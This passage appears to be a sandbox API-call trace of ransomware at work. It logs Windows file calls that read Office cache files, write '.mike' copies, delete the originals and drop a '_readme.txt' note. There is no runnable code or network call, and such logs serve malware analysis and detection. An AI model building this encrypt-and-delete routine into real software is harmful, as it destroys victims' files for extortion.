ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x32b)) returned 1 [0040.164] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0040.164] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.164] GetFileType (hFile=0x264) returned 0x1 [0040.164] GetFileType (hFile=0x264) returned 0x1 [0040.164] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0040.164] ReadFile (in: hFile=0x264, lpBuffer=0x225e1ec, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x225e1ec*, lpNumberOfBytesRead=0x2af110*=0x32b, lpOverlapped=0x0) returned 1 [0040.166] CloseHandle (hObject=0x264) returned 1 [0040.166] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike", lpFilePart=0x0) returned 0x50 [0040.166] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.166] GetFileType (hFile=0x264) returned 0x1 [0040.167] GetFileType (hFile=0x264) returned 0x1 [0040.167] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0040.167] WriteFile (in: hFile=0x264, lpBuffer=0x22623a8*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x22623a8*, lpNumberOfBytesWritten=0x2af104*=0x330, lpOverlapped=0x0) returned 1 [0040.167] CloseHandle (hObject=0x264) returned 1 [0040.168] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike", lpFilePart=0x0) returned 0x50 [0040.168] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.168] GetFileType (hFile=0x264) returned 0x1 [0040.168] GetFileType (hFile=0x264) returned 0x1 [0040.169] WriteFile (in: hFile=0x264, lpBuffer=0x22655dc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x22655dc*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0040.169] CloseHandle (hObject=0x264) returned 1 [0040.170] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0040.170] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike", lpFilePart=0x0) returned 0x50 [0040.170] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe224b340, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe224b340, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe224b340, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x550)) returned 1 [0040.170] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0040.170] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike", lpFilePart=0x0) returned 0x50 [0040.170] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2266d80 | out: lpFileInformation=0x2266d80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe224b340, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe224b340, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe224b340, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x550)) returned 1 [0040.170] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0040.170] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", dwFileAttributes=0x80) returned 1 [0040.171] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0040.171] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml")) returned 1 [0040.221] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0040.221] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.221] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0040.221] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0040.221] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.221] GetFileType (hFile=0x264) returned 0x1 [0040.222] GetFileType (hFile=0x264) returned 0x1 [0040.222] WriteFile (in: hFile=0x264, lpBuffer=0x2268a84*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x2268a84*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0040.223] CloseHandle (hObject=0x264) returned 1 [0040.223] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.223] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.223] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.223] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.223] GetFileType (hFile=0x264) returned 0x1 [0040.223] GetFileType (hFile=0x264) returned 0x1 [0040.223] CloseHandle (hObject=0x264) returned 1 [0040.223] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.223] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.224] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0040.224] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0040.224] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x226aa58 | out: lpFileInformation=0x226aa58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc)) returned 1 [0040.224] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.224] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x226ad74 | out: lpFileInformation=0x226ad74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc)) returned 1 [0040.224] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.224] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.224] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.224] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.224] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.225] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.225] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.225] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.225] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.225] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0040.225] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.225] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.225] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.225] GetFileType (hFile=0x264) returned 0x1 [0040.225] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.225] GetFileType (hFile=0x264) returned 0x1 [0040.225] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0040.225] WriteFile (in: hFile=0x264, lpBuffer=0x226bbf0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x226bbf0*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0040.226] CloseHandle (hObject=0x264) returned 1 [0040.226] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0040.226] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x226b6f8 | out: lpFileInformation=0x226b6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc)) returned 1 [0040.227] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0040.227] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.227] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0040.227] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.227] GetFileType (hFile=0x264) returned 0x1 [0040.227] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0040.227] GetFileType (hFile=0x264) returned 0x1 [0040.227] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0040.227] ReadFile (in: hFile=0x264, lpBuffer=0x226cd18, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x226cd18*, lpNumberOfBytesRead=0x2af110*=0x16fc, lpOverlapped=0x0) returned 1 [0040.229] CloseHandle (hObject=0x264) returned 1 [0040.229] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.229] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.229] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.229] GetFileType (hFile=0x264) returned 0x1 [0040.229] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.230] GetFileType (hFile=0x264) returned 0x1 [0040.230] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0040.230] WriteFile (in: hFile=0x264, lpBuffer=0x2276d68*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2276d68*, lpNumberOfBytesWritten=0x2af124*=0x1700, lpOverlapped=0x0) returned 1 [0040.230] CloseHandle (hObject=0x264) returned 1 [0040.231] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.231] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0040.231] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.231] GetFileType (hFile=0x264) returned 0x1 [0040.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0040.231] GetFileType (hFile=0x264) returned 0x1 [0040.232] WriteFile (in: hFile=0x264, lpBuffer=0x227a7c0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x227a7c0*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0040.232] CloseHandle (hObject=0x264) returned 1 [0040.233] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.233] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.233] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.233] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe22e38c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe22e38c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe22e38c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x1920)) returned 1 [0040.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.233] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.233] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All 